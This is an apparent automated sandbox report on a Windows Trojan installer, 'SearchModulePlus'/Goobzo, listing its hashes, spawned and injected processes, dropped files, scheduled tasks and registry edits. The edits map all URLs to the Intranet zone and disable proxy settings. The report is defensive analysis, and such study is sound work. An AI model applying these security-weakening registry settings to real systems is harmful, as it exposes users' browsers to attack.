MD5: def2ef7cccb781ba21f79eda2c38cdf4
SHA1: a55690bf1356f623b9ee32d38ac7ecfbbb0e11f3
SHA256: 003636be14717d682837c0cea06bec15f1ccaf7008f9543560bd3a9a70df8b30
SSDeep: 24576:DFTng7HUyPNos/Jc2RMf5GEvVSh4RJ7ChQXQjTtLXGufSoIv:RYHU8Nos/JcMgNVSh4RJuhQAPtLXGufY
Size: 1210344 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2015-05-16 10:27:32
Analyzed on: WindowsXP SP3 32-bit

Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

smu.exe:1632
smu.exe:1064
smu.exe:636
wscript.exe:2024
sma.exe:2308
sma.exe:2444
sma.exe:2296
sma.exe:2236
sma.exe:2108
sma.exe:508
sma.exe:3112

The Trojan injects its code into the following process(es):

%original file name%.exe:928
%original file name%.exe:700
ins_smk.exe:472

Mutexes

The following mutexes were created/opened:

TSMtx21873
ZonesLockedCacheCounterMutex
ZonesCounterMutex
ZonesCacheCounterMutex
RasPbFile
ShimCacheMutex
WininetProxyRegistryMutex
WininetConnectionMutex
WininetStartupMutex
c:!documents and settings!adm!local settings!history!history.ie5!
c:!documents and settings!adm!cookies!
c:!documents and settings!adm!local settings!temporary internet files!content.ie5!
_!MSFTHISTORY!_
DBWinMutex
oleacc-msaa-loaded

File activity

The process smu.exe:1632 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Tasks\SMW_UpdateTask_Time_3835323735333432352d3437415a556c2a3223346c41.job (968 bytes)
%Documents and Settings%\All Users\Application Data\SearchModulePlus\smhe.js (407 bytes)

The process smu.exe:636 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\All Users\Application Data\SearchModulePlus\smhe.js (411 bytes)

The process %original file name%.exe:928 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)

The process %original file name%.exe:700 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\Install_31932\ins_smk.exe (51718 bytes)

The process ins_smk.exe:472 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\Common Files\Goobzo\GBUpdatePlus\SMUninstall.exe (19096 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\sma.exe (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv3.tmp\System.dll (11 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\SBIEBrowserHelperObject.dll (784 bytes)
%WinDir%\Tasks\SMWPUpd.job (1152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv3.tmp\nsExec.dll (6 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\smci32.dll (34561 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\smfi32.dll (23296 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\smei32.dll (24832 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\smri32.dll (13584 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv3.tmp\ns5.tmp (6 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\smu.exe (58402 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv3.tmp\AccDownload.dll (11344 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\Updater.exe (25112 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\smw.sys (784 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\smi32.exe (2392 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\smoi32.dll (14184 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv2.tmp (312459 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsq1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv3.tmp (0 bytes)

Registry activity

The process smu.exe:1632 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "88 11 5A 70 AB F3 B7 37 C5 1D F8 7B FA D9 1A EB"

[HKLM\SOFTWARE\SearchModulePlus\SMUpdPlus]
"Rlt" = "Type: REG_QWORD, Length: 8"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\SearchModulePlus\SMUpdPlus]
"Scf" = "42 E2 A3 CA 5E 7B D2 E3 A5 C9 10 B1 D9 5C 9A 8C"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Wow6432Node\SearchModulePlus\SMUpdPlus\Users\Default]
"Ucf" = "AF 19 06 18 24 A7 78 A7 83 2B E1 77 84 81 A9 3B"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\SearchModulePlus\SMUpdPlus\Users\Default]
"Spt" = "0E 67 60 5E E3 C9 4E D4 C3 0C 82 C4 22 7A B0 07"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\SearchModulePlus\SMUpdPlus]
"Gcf" = "D9 A5 D4 C7 0B 94 E4 04 31 95 5A 08 A8 9B 13 3E"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\SearchModulePlus\SMUpdPlus\Users\Default]
"Ucf" = "AF 19 06 18 24 A7 78 A7 83 2B E1 77 84 81 A9 3B"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

The process smu.exe:1064 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "90 50 1D 5E 4F 4E 2D 12 BB 43 CD 5A E6 3E A7 92"

[HKLM\SOFTWARE\SearchModulePlus\SMUpdPlus]
"Scf" = "0B 78 BB E1 9B 14 75 04 D8 D6 C8 5F BD 8C 24 E9"

The process smu.exe:636 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "88 75 0A 49 A4 8C 6D 02 AB 52 45 70 73 52 D0 27"

[HKLM\SOFTWARE\SearchModulePlus\SMUpdPlus]
"Rlt" = "Type: REG_QWORD, Length: 8"
"Scf" = "7C C8 1C CD 9E 72 BD 96 75 A8 96 0C BD E8 9C D8"
"Ubl" = ""

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"LoadAppInit_DLLs" = "0"

[HKLM\SOFTWARE\SearchModulePlus\SMUpdPlus]
"Gcf" = "F5 51 B4 7D 96 EC E2 C3 29 9A DE C8 34 1B D4 EF"
"Ult" = "Type: REG_QWORD, Length: 8"

The process wscript.exe:2024 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F8 01 D4 70 51 66 32 DF FF EC 1E BE B6 70 F2 81"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\Common Files\Goobzo\GBUpdatePlus]
"smu.exe" = "Search Module Plus Update Service"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The process %original file name%.exe:928 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "19 AD A6 34 70 DA A8 1D 5A 7A C9 09 B9 5A 87 46"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process %original file name%.exe:700 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MaxConnectionsPerServer" = "2"
"MaxConnectionsPer1_0Server" = "2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1C 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7F D7 D8 C3 FD B6 16 C5 8C 7E D6 7D 4F BE 19 22"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process sma.exe:2308 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "98 00 06 C6 07 83 8B 19 82 93 36 0D C1 11 6C 9B"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 05 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

Proxy settings are disabled:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoConfigURL"
"ProxyServer"

The process sma.exe:2444 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B7 E4 60 F3 D9 36 94 99 98 AB 63 B4 82 4A 7D AC"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 06 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

Proxy settings are disabled:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoConfigURL"
"ProxyServer"

The process sma.exe:2296 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "41 41 41 69 CC F0 26 A5 74 46 B8 4D A3 F7 53 BC"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 04 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

Proxy settings are disabled:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoConfigURL"
"ProxyServer"

The process sma.exe:2236 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

